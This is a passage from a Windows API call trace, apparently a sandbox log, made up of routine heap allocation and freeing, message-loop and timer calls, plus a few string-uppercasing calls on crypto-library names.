returned 1 [0195.525] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0195.525] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540f8 | out: hHeap=0x970000) returned 1 [0195.525] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ab8 | out: hHeap=0x970000) returned 1 [0195.525] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0195.526] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0195.526] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50998 | out: hHeap=0x970000) returned 1 [0195.526] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50860 | out: hHeap=0x970000) returned 1 [0195.526] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0195.526] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0195.526] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507d0 | out: hHeap=0x970000) returned 1 [0195.526] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507b8 | out: hHeap=0x970000) returned 1 [0195.526] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0195.526] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c08 | out: hHeap=0x970000) returned 1 [0195.526] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0195.526] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a10 | out: hHeap=0x970000) returned 1 [0195.526] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c20 | out: hHeap=0x970000) returned 1 [0195.526] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b30 | out: hHeap=0x970000) returned 1 [0195.526] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a28 | out: hHeap=0x970000) returned 1 [0195.526] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c50 | out: hHeap=0x970000) returned 1 [0195.526] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a70 | out: hHeap=0x970000) returned 1 [0195.526] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ba8 | out: hHeap=0x970000) returned 1 [0195.526] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ad0 | out: hHeap=0x970000) returned 1 [0195.526] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c68 | out: hHeap=0x970000) returned 1 [0195.526] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a88 | out: hHeap=0x970000) returned 1 [0195.526] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0195.526] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x9778d8 | out: hHeap=0x970000) returned 1 [0195.527] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b48 | out: hHeap=0x970000) returned 1 [0195.527] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b00 | out: hHeap=0x970000) returned 1 [0195.527] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c98 | out: hHeap=0x970000) returned 1 [0195.527] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c80 | out: hHeap=0x970000) returned 1 [0195.527] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cb0 | out: hHeap=0x970000) returned 1 [0195.527] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509c8 | out: hHeap=0x970000) returned 1 [0195.527] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50aa0 | out: hHeap=0x970000) returned 1 [0195.527] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b48 | out: hHeap=0x970000) returned 1 [0195.527] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56430 | out: hHeap=0x970000) returned 1 [0195.527] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0195.527] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509f8 | out: hHeap=0x970000) returned 1 [0195.527] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b60 | out: hHeap=0x970000) returned 1 [0195.527] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c38 | out: hHeap=0x970000) returned 1 [0195.527] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bd8 | out: hHeap=0x970000) returned 1 [0195.527] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b78 | out: hHeap=0x970000) returned 1 [0195.527] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b90 | out: hHeap=0x970000) returned 1 [0195.527] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bf0 | out: hHeap=0x970000) returned 1 [0195.527] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bc0 | out: hHeap=0x970000) returned 1 [0195.561] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54558 | out: hHeap=0x970000) returned 1 [0195.561] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0195.561] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e558d8 | out: hHeap=0x970000) returned 1 [0195.561] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e558d8 [0195.561] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0195.562] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0195.562] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550a8 [0195.562] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550f8 [0195.562] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550e8 [0195.562] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69be8 [0195.562] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f58 [0195.562] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0195.562] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0195.562] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69be8 | out: hHeap=0x970000) returned 1 [0195.562] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0195.562] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0195.562] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77ac8 [0195.562] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0195.562] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77ac8 | out: hHeap=0x970000) returned 1 [0195.562] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0195.562] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f48 [0195.562] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0195.562] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0195.562] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0195.562] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0195.562] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0195.563] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0195.563] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50998 [0195.563] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507d0 [0195.563] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0195.563] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69c08 [0195.563] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x9778d8 [0195.563] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50710 [0195.563] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0195.563] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0195.563] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507b8 [0195.563] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d68 [0195.563] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0195.563] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0195.563] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x100000) returned 0x12a3020 [0195.780] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0195.780] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0195.780] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x9778d8 | out: hHeap=0x970000) returned 1 [0195.780] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69c08 | out: hHeap=0x970000) returned 1 [0195.780] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507d0 | out: hHeap=0x970000) returned 1 [0195.780] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507b8 | out: hHeap=0x970000) returned 1 [0195.780] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50998 | out: hHeap=0x970000) returned 1 [0195.780] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0195.780] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0195.780] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0195.780] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50950 | out: hHeap=0x970000) returned 1 [0195.780] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0195.780] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x100000) returned 0x13bd020 [0195.802] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x12a3020 | out: hHeap=0x970000) returned 1 [0195.813] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0195.813] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 1 [0195.813] TranslateMessage (lpMsg=0x8cf3b8) returned 0 [0195.813] DispatchMessageW (lpMsg=0x8cf3b8) returned 0x0 [0195.813] KillTimer (hWnd=0x402c2, uIDEvent=0x1) returned 1 [0195.813] SetTimer (hWnd=0x402c2, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0195.814] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0195.814] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dd8 [0195.814] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0195.814] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a48 | out: hHeap=0x970000) returned 1 [0195.814] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0195.814] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dd8 [0195.814] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0195.814] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e698c8 [0195.814] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e698c8 | out: hHeap=0x970000) returned 1 [0195.814] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0195.814] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0195.814] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0195.814] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54558 [0195.814] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0195.814] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0195.814] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54558 | out: hHeap=0x970000) returned 1 [0195.814] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0195.814] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50950 [0195.814] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0195.814] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0195.814] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e801e8 [0195.814] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0195.814] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0195.814] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e801e8 | out: hHeap=0x970000) returned 1 [0195.815] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0195.815] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50860 [0195.815] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0195.815] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0195.815] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0195.815] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0195.815] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0195.815] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d68 [0195.815] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699a8 [0195.815] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699a8 | out: hHeap=0x970000) returned 1 [0195.815] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0195.815] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0195.815] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50998 [0195.815] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e507b8 [0195.815] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506e0 [0195.815] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50710 [0195.815] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50728 [0195.823] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50740 [0195.823] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54558 [0195.823] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50998 | out: hHeap=0x970000) returned 1 [0195.823] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e508a8 [0195.823] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50770 [0195.823] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e507d0 [0195.823] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0195.823] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0195.823] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0195.823] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0195.823] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0195.823] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507b8 | out: hHeap=0x970000) returned 1 [0195.823] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0195.823] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0195.823] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0195.823] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0195.824] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0195.824] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507d0 | out: hHeap=0x970000) returned 1 [0195.824] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54558 | out: hHeap=0x970000) returned 1 [0195.824] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0195.824] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0195.824] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50860 | out: hHeap=0x970000) returned 1 [0195.824] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0195.824] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0195.824] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fce0 [0195.824] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0195.824] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0195.824] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fce0 | out: hHeap=0x970000) returned 1 [0195.824] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0195.824] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50860 [0195.824] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b70 [0195.824] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0195.824] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0195.824] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d68 [0195.824] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0195.824] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0195.824] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b70 | out: hHeap=0x970000) returned 1 [0195.824] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50860 | out: hHeap=0x970000) returned 1 [0195.824] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0195.824] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699e8 [0195.824] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699e8 | out: hHeap=0x970000) returned 1 [0195.824] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0195.824] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0195.825] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a48 [0195.825] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0195.825] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a48 | out: hHeap=0x970000) returned 1 [0195.825] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0195.825] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0195.825] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50950 | out: hHeap=0x970000) returned 1 [0195.825] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0195.825] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dd8 [0195.825] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507d0 [0195.825] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508a8 [0195.825] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0195.825] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0195.825] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507b8 [0195.825] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0195.825] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0195.825] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508c0 [0195.825] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0195.825] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0195.825] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x100000) returned 0x12ad020 [0195.900] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0195.900] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0195.900] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x100000) returned 0x14c4020 [0195.935] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0195.935] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507b8 | out: hHeap=0x970000) returned 1 [0195.935] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x12ad020 | out: hHeap=0x970000) returned 1 [0195.942] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0195.942] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0195.942] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507d0 | out: hHeap=0x970000) returned 1 [0195.942] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0195.942] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0195.942] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x100000) returned 0x12a5020 [0197.540] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x14c4020 | out: hHeap=0x970000) returned 1 [0197.552] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0197.552] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0197.552] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x100000) returned 0x14ce020 [0197.573] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x12a5020 | out: hHeap=0x970000) returned 1 [0197.621] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0197.621] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0197.621] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0197.621] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50920 | out: hHeap=0x970000) returned 1 [0197.621] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0197.621] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54418 | out: hHeap=0x970000) returned 1 [0197.621] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509e0 | out: hHeap=0x970000) returned 1 [0197.621] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a40 | out: hHeap=0x970000) returned 1 [0197.621] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a58 | out: hHeap=0x970000) returned 1 [0197.621] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ae8 | out: hHeap=0x970000) returned 1 